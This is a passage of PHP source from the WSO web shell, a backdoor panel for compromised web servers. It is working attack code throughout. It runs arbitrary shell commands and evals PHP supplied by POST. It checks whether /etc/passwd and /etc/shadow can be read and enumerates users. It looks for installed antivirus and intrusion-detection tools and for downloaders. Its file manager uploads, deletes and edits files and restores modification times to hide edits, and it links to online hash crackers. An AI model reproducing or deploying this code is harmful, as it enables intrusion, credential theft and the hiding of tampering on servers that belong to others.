    $out ob_get_clean();
        } elseif (
    function_exists('system')) {
            
    ob_start();
            @
    system($in);
            
    $out ob_get_clean();
        } elseif (
    function_exists('shell_exec')) {
            
    $out shell_exec($in);
        } elseif (
    is_resource($f = @popen($in,"r"))) {
            
    $out "";
            while(!@
    feof($f))
                
    $out .= fread($f,1024);
            
    pclose($f);
        }
        return 
    $out;
    }

    function 
    wsoViewSize($s) {
        if (
    is_int($s))
            
    $s sprintf("%u"$s);
        
        if(
    $s >= 1073741824)
            return 
    sprintf('%1.2f'$s 1073741824 ). ' GB';
        elseif(
    $s >= 1048576)
            return 
    sprintf('%1.2f'$s 1048576 ) . ' MB';
        elseif(
    $s >= 1024)
            return 
    sprintf('%1.2f'$s 1024 ) . ' KB';
        else
            return 
    $s ' B';
    }

    function 
    wsoPerms($p) {
        if ((
    $p 0xC000) == 0xC000)$i 's';
        elseif ((
    $p 0xA000) == 0xA000)$i 'l';
        elseif ((
    $p 0x8000) == 0x8000)$i '-';
        elseif ((
    $p 0x6000) == 0x6000)$i 'b';
        elseif ((
    $p 0x4000) == 0x4000)$i 'd';
        elseif ((
    $p 0x2000) == 0x2000)$i 'c';
        elseif ((
    $p 0x1000) == 0x1000)$i 'p';
        else 
    $i 'u';
        
    $i .= (($p 0x0100) ? 'r' '-');
        
    $i .= (($p 0x0080) ? 'w' '-');
        
    $i .= (($p 0x0040) ? (($p 0x0800) ? 's' 'x' ) : (($p 0x0800) ? 'S' '-'));
        
    $i .= (($p 0x0020) ? 'r' '-');
        
    $i .= (($p 0x0010) ? 'w' '-');
        
    $i .= (($p 0x0008) ? (($p 0x0400) ? 's' 'x' ) : (($p 0x0400) ? 'S' '-'));
        
    $i .= (($p 0x0004) ? 'r' '-');
        
    $i .= (($p 0x0002) ? 'w' '-');
        
    $i .= (($p 0x0001) ? (($p 0x0200) ? 't' 'x' ) : (($p 0x0200) ? 'T' '-'));
        return 
    $i;
    }

    function 
    wsoPermsColor($f) {
        if (!@
    is_readable($f))
            return 
    '<font color=#FF0000>' wsoPerms(@fileperms($f)) . '</font>';
        elseif (!@
    is_writable($f))
            return 
    '<font color=white>' wsoPerms(@fileperms($f)) . '</font>';
        else
            return 
    '<font color=#25ff00>' wsoPerms(@fileperms($f)) . '</font>';
    }

    function 
    wsoScandir($dir) {
        if(
    function_exists("scandir")) {
            return 
    scandir($dir);
        } else {
            
    $dh  opendir($dir);
            while (
    false !== ($filename readdir($dh)))
                
    $files[] = $filename;
            return 
    $files;
        }
    }

    function 
    wsoWhich($p) {
        
    $path wsoEx('which ' $p);
        if(!empty(
    $path))
            return 
    $path;
        return 
    false;
    }

    function 
    actionSecInfo() {
        
    wsoHeader();
        echo 
    '<h1>Server security information</h1><div class=content>';
        function 
    wsoSecParam($n$v) {
            
    $v trim($v);
            if(
    $v) {
                echo 
    '<span>' $n ': </span>';
                if(
    strpos($v"\n") === false)
                    echo 
    $v '<br>';
                else
                    echo 
    '<pre class=ml1>' $v '</pre>';
            }
        }

        
    wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
        if(
    function_exists('apache_get_modules'))
            
    wsoSecParam('Loaded Apache modules'implode(', 'apache_get_modules()));
        
    wsoSecParam('Disabled PHP Functions'$GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
        
    wsoSecParam('Open base dir', @ini_get('open_basedir'));
        
    wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
        
    wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
        
    wsoSecParam('cURL support'function_exists('curl_version')?'enabled':'no');
        
    $temp=array();
        if(
    function_exists('mysql_get_client_info'))
            
    $temp[] = "MySql (".mysql_get_client_info().")";
        if(
    function_exists('mssql_connect'))
            
    $temp[] = "MSSQL";
        if(
    function_exists('pg_connect'))
            
    $temp[] = "PostgreSQL";
        if(
    function_exists('oci_connect'))
            
    $temp[] = "Oracle";
        
    wsoSecParam('Supported databases'implode(', '$temp));
        echo 
    '<br>';

        if(
    $GLOBALS['os'] == 'nix') {
                
    wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
                
    wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
                
    wsoSecParam('OS version', @file_get_contents('/proc/version'));
                
    wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
                if(!
    $GLOBALS['safe_mode']) {
                    
    $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
                    
    $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
                    
    $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
                    echo 
    '<br>';
                    
    $temp=array();
                    foreach (
    $userful as $item)
                        if(
    wsoWhich($item))
                            
    $temp[] = $item;
                    
    wsoSecParam('Userful'implode(', ',$temp));
                    
    $temp=array();
                    foreach (
    $danger as $item)
                        if(
    wsoWhich($item))
                            
    $temp[] = $item;
                    
    wsoSecParam('Danger'implode(', ',$temp));
                    
    $temp=array();
                    foreach (
    $downloaders as $item)
                        if(
    wsoWhich($item))
                            
    $temp[] = $item;
                    
    wsoSecParam('Downloaders'implode(', ',$temp));
                    echo 
    '<br/>';
                    
    wsoSecParam('HDD space'wsoEx('df -h'));
                    
    wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
                    echo 
    '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
                    if (isset (
    $_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
                        
    $temp "";
                        for(;
    $_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
                            
    $uid = @posix_getpwuid($_POST['p2']);
                            if (
    $uid)
                                
    $temp .= join(':',$uid)."\n";
                        }
                        echo 
    '<br/>';
                        
    wsoSecParam('Users'$temp);
                    }
                }
        } else {
            
    wsoSecParam('OS Version',wsoEx('ver'));
            
    wsoSecParam('Account Settings',wsoEx('net accounts'));
            
    wsoSecParam('User Accounts',wsoEx('net user'));
        }
        echo 
    '</div>';
        
    wsoFooter();
    }

    function 
    actionPhp() {
        if(isset(
    $_POST['ajax'])) {
            
    WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax'true);
            
    ob_start();
            eval(
    $_POST['p1']);
            
    $temp "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
            echo 
    strlen($temp), "\n"$temp;
            exit;
        }
        if(empty(
    $_POST['ajax']) && !empty($_POST['p1']))
            
    WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax'0);

        
    wsoHeader();
        if(isset(
    $_POST['p2']) && ($_POST['p2'] == 'info')) {
            echo 
    '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
            
    ob_start();
            
    phpinfo();
            
    $tmp ob_get_clean();
            
    $tmp preg_replace(array (
                
    '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU',
                
    '!td, th {(.*)}!msiU',
                
    '!<img[^>]+>!msiU',
            ), array (
                
    '',
                
    '.e, .v, .h, .h th {$1}',
                
    ''
            
    ), $tmp);
            echo 
    str_replace('<h1','<h2'$tmp) .'</div><br>';
        }
        echo 
    '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
        echo 
    ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
        if(!empty(
    $_POST['p1'])) {
            
    ob_start();
            eval(
    $_POST['p1']);
            echo 
    htmlspecialchars(ob_get_clean());
        }
        echo 
    '</pre></div>';
        
    wsoFooter();
    }

    function 
    actionFilesMan() {
        if (!empty (
    $_COOKIE['f']))
            
    $_COOKIE['f'] = @unserialize($_COOKIE['f']);
        
        if(!empty(
    $_POST['p1'])) {
            switch(
    $_POST['p1']) {
                case 
    'uploadFile':
                    if(!@
    move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
                        echo 
    "Can't upload!";
                    break;
                case 
    'mkdir':
                    if(!@
    mkdir($_POST['p2']))
                        echo 
    "Can't create!";
                    break;
                case 
    'delete':
                    function 
    deleteDir($path) {
                        
    $path = (substr($path,-1)=='/') ? $path:$path.'/';
                        
    $dh  opendir($path);
                        while ( (
    $item readdir($dh) ) !== false) {
                            
    $item $path.$item;
                            if ( (
    basename($item) == "..") || (basename($item) == ".") )
                                continue;
                            
    $type filetype($item);
                            if (
    $type == "dir")
                                
    deleteDir($item);
                            else
                                @
    unlink($item);
                        }
                        
    closedir($dh);
                        @
    rmdir($path);
                    }
                    if(
    is_array(@$_POST['f']))
                        foreach(
    $_POST['f'] as $f) {
                            if(
    $f == '..')
                                continue;
                            
    $f urldecode($f);
                            if(
    is_dir($f))
                                
    deleteDir($f);
                            else
                                @
    unlink($f);
                        }
                    break;
                case 
    'paste':
                    if(
    $_COOKIE['act'] == 'copy') {
                        function 
    copy_paste($c,$s,$d){
                            if(
    is_dir($c.$s)){
                                
    mkdir($d.$s);
                                
    $h = @opendir($c.$s);
                                while ((
    $f = @readdir($h)) !== false)
                                    if ((
    $f != ".") and ($f != ".."))
                                        
    copy_paste($c.$s.'/',$f$d.$s.'/');
                            } elseif(
    is_file($c.$s))
                                @
    copy($c.$s$d.$s);
                        }
                        foreach(
    $_COOKIE['f'] as $f)
                            
    copy_paste($_COOKIE['c'],$f$GLOBALS['cwd']);
                    } elseif(
    $_COOKIE['act'] == 'move') {
                        function 
    move_paste($c,$s,$d){
                            if(
    is_dir($c.$s)){
                                
    mkdir($d.$s);
                                
    $h = @opendir($c.$s);
                                while ((
    $f = @readdir($h)) !== false)
                                    if ((
    $f != ".") and ($f != ".."))
                                        
    copy_paste($c.$s.'/',$f$d.$s.'/');
                            } elseif(@
    is_file($c.$s))
                                @
    copy($c.$s$d.$s);
                        }
                        foreach(
    $_COOKIE['f'] as $f)
                            @
    rename($_COOKIE['c'].$f$GLOBALS['cwd'].$f);
                    } elseif(
    $_COOKIE['act'] == 'zip') {
                        if(
    class_exists('ZipArchive')) {
                            
    $zip = new ZipArchive();
                            if (
    $zip->open($_POST['p2'], 1)) {
                                
    chdir($_COOKIE['c']);
                                foreach(
    $_COOKIE['f'] as $f) {
                                    if(
    $f == '..')
                                        continue;
                                    if(@
    is_file($_COOKIE['c'].$f))
                                        
    $zip->addFile($_COOKIE['c'].$f$f);
                                    elseif(@
    is_dir($_COOKIE['c'].$f)) {
                                        
    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'FilesystemIterator::SKIP_DOTS));
                                        foreach (
    $iterator as $key=>$value) {
                                            
    $zip->addFile(realpath($key), $key);
                                        }
                                    }
                                }
                                
    chdir($GLOBALS['cwd']);
                                
    $zip->close();
                            }
                        }
                    } elseif(
    $_COOKIE['act'] == 'unzip') {
                        if(
    class_exists('ZipArchive')) {
                            
    $zip = new ZipArchive();
                            foreach(
    $_COOKIE['f'] as $f) {
                                if(
    $zip->open($_COOKIE['c'].$f)) {
                                    
    $zip->extractTo($GLOBALS['cwd']);
                                    
    $zip->close();
                                }
                            }
                        }
                    } elseif(
    $_COOKIE['act'] == 'tar') {
                        
    chdir($_COOKIE['c']);
                        
    $_COOKIE['f'] = array_map('escapeshellarg'$_COOKIE['f']);
                        
    wsoEx('tar cfzv ' escapeshellarg($_POST['p2']) . ' ' implode(' '$_COOKIE['f']));
                        
    chdir($GLOBALS['cwd']);
                    }
                    unset(
    $_COOKIE['f']);
                    
    setcookie('f'''time() - 3600);
                    break;
                default:
                    if(!empty(
    $_POST['p1'])) {
                        
    WSOsetcookie('act'$_POST['p1']);
                        
    WSOsetcookie('f'serialize(@$_POST['f']));
                        
    WSOsetcookie('c', @$_POST['c']);
                    }
                    break;
            }
        }
        
    wsoHeader();
        echo 
    '<h1>File manager</h1><div class=content><div class="base64" title="PHNjcmlwdD5wMV89cDJfPXAzXz0iIjs8L3NjcmlwdD4="></div>

    '
    ;
        
    $dirContent wsoScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
        if(
    $dirContent === false) {    echo 'Can\'t open this folder!';wsoFooter(); return; }
        global 
    $sort;
        
    $sort = array('name'1);
        if(!empty(
    $_POST['p1'])) {
            if(
    preg_match('!s_([A-z]+)_(\d{1})!'$_POST['p1'], $match))
                
    $sort = array($match[1], (int)$match[2]);
        }
    echo 
    "<div class="base64" title="PHNjcmlwdD4KCWZ1bmN0aW9uIHNhKCkgewoJCWZvcihpPTA7aTxkLmZpbGVzLmVsZW1lbnRzLmxlbmd0aDtpKyspCgkJCWlmKGQuZmlsZXMuZWxlbWVudHNbaV0udHlwZSA9PSAnY2hlY2tib3gnKQoJCQkJZC5maWxlcy5lbGVtZW50c1tpXS5jaGVja2VkID0gZC5maWxlcy5lbGVtZW50c1swXS5jaGVja2VkOwoJfQo8L3NjcmlwdD4="></div>


    <table width='100%' class='main' cellspacing='0' cellpadding='2'>
    <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_"
    .($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
        
    $dirs $files = array();
        
    $n count($dirContent);
        for(
    $i=0;$i<$n;$i++) {
            
    $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
            
    $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
            
    $tmp = array('name' => $dirContent[$i],
                         
    'path' => $GLOBALS['cwd'].$dirContent[$i],
                         
    'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
                         
    'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
                         
    'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
                         
    'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
                         
    'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
                        );
            if(@
    is_file($GLOBALS['cwd'] . $dirContent[$i]))
                
    $files[] = array_merge($tmp, array('type' => 'file'));
            elseif(@
    is_link($GLOBALS['cwd'] . $dirContent[$i]))
                
    $dirs[] = array_merge($tmp, array('type' => 'link''link' => readlink($tmp['path'])));
            elseif(@
    is_dir($GLOBALS['cwd'] . $dirContent[$i]))
                
    $dirs[] = array_merge($tmp, array('type' => 'dir'));
        }
        
    $GLOBALS['sort'] = $sort;
        function 
    wsoCmp($a$b) {
            if(
    $GLOBALS['sort'][0] != 'size')
                return 
    strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
            else
                return ((
    $a['size'] < $b['size']) ? -1)*($GLOBALS['sort'][1]?1:-1);
        }
        
    usort($files"wsoCmp");
        
    usort($dirs"wsoCmp");
        
    $files array_merge($dirs$files);
        
    $l 0;
        foreach(
    $files as $f) {
            echo 
    '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' "title='{$f['link']}'") . '><b>[ ' htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
                .
    '</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
            
    $l $l?0:1;
        }
        echo 
    "<tr><td colspan=7>
        <input type=hidden name=a value='FilesMan'>
        <input type=hidden name=c value='" 
    htmlspecialchars($GLOBALS['cwd']) ."'>
        <input type=hidden name=charset value='"
    . (isset($_POST['charset'])?$_POST['charset']:'')."'>
        <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"
    ;
        if(
    class_exists('ZipArchive'))
            echo 
    "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
        echo 
    "<option value='tar'>Compress (tar.gz)</option>";
        if(!empty(
    $_COOKIE['act']) && @count($_COOKIE['f']))
            echo 
    "<option value='paste'>Paste / Compress</option>";
        echo 
    "</select>&nbsp;";
        if(!empty(
    $_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
            echo 
    "file name: <input type=text name=p2 value='wso_" date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>&nbsp;";
        echo 
    "<input type='submit' value='>>'></td></tr></form></table></div>";
        
    wsoFooter();
    }

    function 
    actionStringTools() {
        if(!
    function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
        if(!
    function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
        if(!
    function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
        if(!
    function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
        if(!
    function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
        
    $stringTools = array(
            
    'Base64 encode' => 'base64_encode',
            
    'Base64 decode' => 'base64_decode',
            
    'Url encode' => 'urlencode',
            
    'Url decode' => 'urldecode',
            
    'Full urlencode' => 'full_urlencode',
            
    'md5 hash' => 'md5',
            
    'sha1 hash' => 'sha1',
            
    'crypt' => 'crypt',
            
    'CRC32' => 'crc32',
            
    'ASCII to HEX' => 'ascii2hex',
            
    'HEX to ASCII' => 'hex2ascii',
            
    'HEX to DEC' => 'hexdec',
            
    'HEX to BIN' => 'hex2bin',
            
    'DEC to HEX' => 'dechex',
            
    'DEC to BIN' => 'decbin',
            
    'BIN to HEX' => 'binhex',
            
    'BIN to DEC' => 'bindec',
            
    'String to lower case' => 'strtolower',
            
    'String to upper case' => 'strtoupper',
            
    'Htmlspecialchars' => 'htmlspecialchars',
            
    'String length' => 'strlen',
        );
        if(isset(
    $_POST['ajax'])) {
            
    WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax'true);
            
    ob_start();
            if(
    in_array($_POST['p1'], $stringTools))
                echo 
    $_POST['p1']($_POST['p2']);
            
    $temp "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
            echo 
    strlen($temp), "\n"$temp;
            exit;
        }
        if(empty(
    $_POST['ajax'])&&!empty($_POST['p1']))
            
    WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax'0);
        
    wsoHeader();
        echo 
    '<h1>String conversions</h1><div class=content>';
        echo 
    "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
        foreach(
    $stringTools as $k => $v)
            echo 
    "<option value='".htmlspecialchars($v)."'>".$k."</option>";
            echo 
    "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
        if(!empty(
    $_POST['p1'])) {
            if(
    in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
        }
        echo
    "</pre></div><br><h1>Search files:</h1><div class=content>
            <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
                <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
                <tr><td>Path:</td><td><input type='text' name='cwd' value='"
    htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
                <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
                <tr><td></td><td><input type='submit' value='>>'></td></tr>
                </table></form>"
    ;

        function 
    wsoRecursiveGlob($path) {
            if(
    substr($path, -1) != '/')
                
    $path.='/';
            
    $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*'GLOB_ONLYDIR)));
            if(
    is_array($paths)&&@count($paths)) {
                foreach(
    $paths as $item) {
                    if(@
    is_dir($item)){
                        if(
    $path!=$item)
                            
    wsoRecursiveGlob($item);
                    } else {
                        if(empty(
    $_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false)
                            echo 
    "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\",\"\")'>".htmlspecialchars($item)."</a><br>";
                    }
                }
            }
        }
        if(@
    $_POST['p3'])
            
    wsoRecursiveGlob($_POST['c']);
        echo 
    "</div><br><h1>Search for hash:</h1><div class=content>
            <form method='post' target='_blank' name='hf'>
                <input type='text' name='hash' style='width:200px;'><br>
                <input type='hidden' name='act' value='find'/>
                <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
                <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
                <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>
            </form></div>"
    ;
        
    wsoFooter();
    }

    function 
    actionFilesTools() {
        if( isset(
    $_POST['p1']) )
            
    $_POST['p1'] = urldecode($_POST['p1']);
        if(@
    $_POST['p2']=='download') {
            if(@
    is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
                
    ob_start("ob_gzhandler"4096);
                
    header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
                if (
    function_exists("mime_content_type")) {
                    
    $type = @mime_content_type($_POST['p1']);
                    
    header("Content-Type: " $type);
                } else
                    
    header("Content-Type: application/octet-stream");
                
    $fp = @fopen($_POST['p1'], "r");
                if(
    $fp) {
                    while(!@
    feof($fp))
                        echo @
    fread($fp1024);
                    
    fclose($fp);
                }
            }exit;
        }
        if( @
    $_POST['p2'] == 'mkfile' ) {
            if(!
    file_exists($_POST['p1'])) {
                
    $fp = @fopen($_POST['p1'], 'w');
                if(
    $fp) {
                    
    $_POST['p2'] = "edit";
                    
    fclose($fp);
                }
            }
        }
        
    wsoHeader();
        echo 
    '<h1>File tools</h1><div class=content>';
        if( !
    file_exists(@$_POST['p1']) ) {
            echo 
    'File not exists';
            
    wsoFooter();
            return;
        }
        
    $uid = @posix_getpwuid(@fileowner($_POST['p1']));
        if(!
    $uid) {
            
    $uid['name'] = @fileowner($_POST['p1']);
            
    $gid['name'] = @filegroup($_POST['p1']);
        } else 
    $gid = @posix_getgrgid(@filegroup($_POST['p1']));
        echo 
    '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
        echo 
    '<span>Change time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
        if( empty(
    $_POST['p2']) )
            
    $_POST['p2'] = 'view';
        if( 
    is_file($_POST['p1']) )
            
    $m = array('View''Highlight''Download''Hexdump''Edit''Chmod''Rename''Touch');
        else
            
    $m = array('Chmod''Rename''Touch');
        foreach(
    $m as $v)
            echo 
    '<a href=# onclick="g(null,null,\'' urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
        echo 
    '<br><br>';
        switch(
    $_POST['p2']) {
            case 
    'view':
                echo 
    '<pre class=ml1>';
                
    $fp = @fopen($_POST['p1'], 'r');
                if(
    $fp) {
                    while( !@
    feof($fp) )
                        echo 
    htmlspecialchars(@fread($fp1024));
                    @
    fclose($fp);
                }
                echo 
    '</pre>';
                break;
            case 
    'highlight':
                if( @
    is_readable($_POST['p1']) ) {
                    echo 
    '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
                    
    $code = @highlight_file($_POST['p1'],true);
                    echo 
    str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
                }
                break;
            case 
    'chmod':
                if( !empty(
    $_POST['p3']) ) {
                    
    $perms 0;
                    for(
    $i=strlen($_POST['p3'])-1;$i>=0;--$i)
                        
    $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
                    if(!@
    chmod($_POST['p1'], $perms))
                        echo 
    'Can\'t set permissions!<br><div class="base64" title="PHNjcmlwdD5kb2N1bWVudC5tZi5wMy52YWx1ZT0iIjs8L3NjcmlwdD4="></div>

    '
    ;
                }
                
    clearstatcache();
                echo 
    '<div class="base64" title="PHNjcmlwdD5wM189IiI7PC9zY3JpcHQ+"></div>

    <form onsubmit="g(null,null,\'' 
    urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o'fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
                break;
            case 
    'edit':
                if( !
    is_writable($_POST['p1'])) {
                    echo 
    'File isn\'t writeable';
                    break;
                }
                if( !empty(
    $_POST['p3']) ) {
                    
    $time = @filemtime($_POST['p1']);
                    
    $_POST['p3'] = substr($_POST['p3'],1);
                    
    $fp = @fopen($_POST['p1'],"w");
                    if(
    $fp) {
                        @
    fwrite($fp,$_POST['p3']);
                        @
    fclose($fp);
                        echo 
    'Saved!<br><div class="base64" title="PHNjcmlwdD5wM189IiI7PC9zY3JpcHQ+"></div>

    '
    ;
                        @
    touch($_POST['p1'],$time,$time);
                    }
                }
                echo 
    '<form onsubmit="g(null,null,\'' urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
                
    $fp = @fopen($_POST['p1'], 'r');
                if(
    $fp) {
                    while( !@
    feof($fp) )
                        echo 
    htmlspecialchars(@fread($fp1024));
                    @
    fclose($fp);
                }
                echo 
    '</textarea><input type=submit value=">>"></form>';
                break;
            case 
    'hexdump':
                
    $c = @file_get_contents($_POST['p1']);
                
    $n 0;
                
    $h = array('00000000<br>','','');
                
    $len strlen($c);
                for (
    $i=0$i<$len; ++$i) {
                    
    $h[1] .= sprintf('%02X',ord($c[$i])).' ';
                    switch ( 
    ord($c[$i]) ) {
                        case 
    0:  $h[2] .= ' '; break;
                        case 
    9:  $h[2] .= ' '; break;
                        case 
    10$h[2] .= ' '; break;
                        case 
    13$h[2] .= ' '; break;
                        default: 
    $h[2] .= $c[$i]; break;
                    }
                    
    $n++;
                    if (
    $n == 32) {
                        
    $n 0;
                        if (
    $i+$len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
                        
    $h[1] .= '<br>';
                        
    $h[2] .= "\n";
                    }
                 }
                echo 
    '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
                break;
            case 
    'rename':
                if( !empty(
    $_POST['p3']) ) {
